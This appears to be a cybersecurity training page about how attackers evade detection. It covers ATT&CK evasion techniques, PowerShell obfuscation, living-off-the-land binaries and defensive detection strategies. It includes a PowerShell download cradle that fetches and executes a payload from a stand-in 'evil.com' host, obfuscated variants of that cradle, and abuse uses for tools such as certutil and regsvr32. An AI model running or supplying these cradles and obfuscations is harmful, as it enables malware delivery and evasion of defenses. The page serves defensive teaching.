Evasion & Obfuscation

How attackers hide from security controls and detection

Why Attackers Evade

Modern security defenses are layered: firewalls, IDS/IPS, EDR, SIEM. Attackers must bypass multiple detection mechanisms to succeed. Understanding evasion helps defenders:

Recognize signs of evasion attempts
Tune detection rules for encoded/obfuscated content
Hunt for techniques that bypass automated detection
Understand attacker tradecraft for better defense

Common Evasion Categories

Click each technique to learn more.

T1573

Encrypted Channels

Using TLS/SSL to hide C2 communication from inspection

T1572

Protocol Tunneling

Hiding malicious traffic inside legitimate protocols (DNS, HTTPS, ICMP)

T1132

Data Encoding

Base64, XOR, custom encoding to bypass pattern matching

T1027

Fragmentation

Splitting payloads across packets or time to evade inspection

T1001.002

Steganography

Hiding data in images, audio, or other innocent-looking files

T1027.001

Polymorphism

Changing malware code each execution to evade signatures

Obfuscation Techniques

Making malicious code harder to analyze and detect

Interactive Decoder

Try decoding these common obfuscation methods:

Click a decode button to see the result...

PowerShell Obfuscation Examples

Attackers use various techniques to hide malicious PowerShell:

# Original command:
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://evil.com/payload')

# Obfuscated versions:
powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0AC...
powershell -enc [base64 encoded command]
iex($env:comspec[4,15,25]-join'')
&((gv '*mdr*').Name[3,11,2]-join'')

Detection Indicators

Indicator	What It Suggests
`-e` or `-enc` flag	Base64 encoded PowerShell command
`FromBase64String`	Runtime decoding of encoded content
Unusual variable names	Auto-generated obfuscated code
String concatenation	Hiding keywords from detection
Tick marks in commands	Breaking up detectable strings

Living Off the Land

Using legitimate system tools for malicious purposes

What is LOTL?

"Living Off the Land" (LOTL) refers to attackers using built-in operating system tools rather than custom malware. This makes detection difficult because:

Tools are signed by Microsoft/Apple — trusted by default
Already present on systems — no need to drop files
Legitimate admin use — hard to distinguish malicious use
No custom indicators — traditional AV cannot detect

Common LOLBins (Windows)

certutil.exe

Download files, decode Base64

mshta.exe

Execute HTA files/scripts

regsvr32.exe

Execute DLLs, bypass AppLocker

rundll32.exe

Execute arbitrary DLLs

wmic.exe

Execute commands, process creation

powershell.exe

Script execution, download cradles

bitsadmin.exe

Download files in background

msiexec.exe

Execute malicious MSI packages

Detection Strategies

Strategy	Implementation
Command-line logging	Enable PowerShell ScriptBlock logging, Sysmon
Behavioral analytics	Monitor for unusual parent-child process relationships
Network correlation	Flag certutil/bitsadmin making external connections
Baseline comparison	Alert on first-time use of LOLBins by users

Knowledge Assessment

Test your understanding of evasion and obfuscation